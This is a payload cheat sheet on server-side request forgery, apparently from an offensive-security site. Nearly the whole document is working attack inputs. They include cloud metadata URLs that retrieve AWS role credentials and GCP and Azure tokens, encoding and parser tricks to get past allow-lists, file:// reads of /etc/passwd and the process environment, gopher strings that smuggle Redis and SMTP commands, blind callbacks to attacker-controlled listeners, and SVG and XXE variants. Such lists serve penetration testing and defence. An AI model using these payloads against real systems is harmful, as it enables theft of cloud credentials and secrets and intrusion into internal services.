
SSRF — Server-Side Request Forgery

Server-side request forgery payloads — internal targets, cloud metadata (AWS/GCP/Azure), IP-encoding and parser-confusion bypasses, protocol smuggling (gopher/file/dict) and blind/parser-driven SSRF.

Jun 2026 lazyhackers
Basic Internal Targets (6)
http://127.0.0.1/
Loopback — reach services bound to localhost
internal loopback
http://localhost:6379/
Redis on localhost (frequently unauthenticated)
internal redis
http://127.0.0.1:9200/_cat/indices
Elasticsearch index listing
internal elastic
http://[::1]/
IPv6 loopback
internal ipv6
http://0.0.0.0:8080/
0.0.0.0 reaches local services on some stacks
internal
http://[email protected]/
userinfo trick — looks external, resolves internal
internal bypass
Cloud Metadata (5)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
AWS IMDSv1 — list IAM roles
cloud aws imds
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE
AWS — fetch the role's temporary credentials
cloud aws
http://169.254.169.254/latest/api/token
AWS IMDSv2 — PUT here first to get a session token
cloud aws imdsv2
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
GCP token (needs header Metadata-Flavor: Google)
cloud gcp
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Azure IMDS (needs header Metadata: true)
cloud azure
IP Encoding Bypass (6)
http://2130706433/
127.0.0.1 as a decimal integer
bypass encoding
http://0x7f000001/
127.0.0.1 in hexadecimal
bypass encoding
http://0177.0.0.1/
127.0.0.1 in octal
bypass encoding
http://127.1/
Short-form loopback
bypass
http://[::ffff:127.0.0.1]/
IPv4-mapped IPv6 address
bypass ipv6
http://127.0.0.1.nip.io/
Public DNS name that resolves to 127.0.0.1
bypass dns
Parser Confusion & Redirect (5)
http://[email protected]/
Everything before @ is userinfo; real host is 127.0.0.1
bypass parser
http://127.0.0.1#@expected.com/
Fragment confuses naive host parsers
bypass parser
http://expected.com\@169.254.169.254/
Backslash parser inconsistency
bypass parser
http://10.10.14.1/redir (302 -> http://169.254.169.254/)
Open redirect to bypass allow-lists
bypass redirect
http://allowed.target.com.attacker.com/
Suffix trick against weak allow-list checks
bypass allowlist
Protocol Smuggling (5)
file:///etc/passwd
Read local files when file:// is permitted
protocol file
file:///proc/self/environ
Leak process environment (secrets) on Linux
protocol file
dict://127.0.0.1:11211/stats
Talk to Memcached via dict://
protocol dict
gopher://127.0.0.1:6379/_SET%20k%20v%0D%0A
Smuggle a Redis command via gopher (RCE primitives)
protocol gopher redis
gopher://127.0.0.1:25/_HELO%20x%0D%0A
Smuggle SMTP via gopher
protocol gopher smtp
Blind SSRF & Parser-Driven (4)
http://YOUR-ID.oast.fun/
OOB interaction (interactsh / Burp Collaborator) for blind SSRF
blind oob
http://10.10.14.1/ssrf
Hit your own listener to confirm an outbound request
blind callback
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="http://169.254.169.254/latest/meta-data/"/></svg>
SVG→PDF/PNG renderer SSRF
parser svg
<!DOCTYPE x [<!ENTITY e SYSTEM "http://169.254.169.254/">]><x>&e;</x>
XXE-driven SSRF via an external entity
parser xxe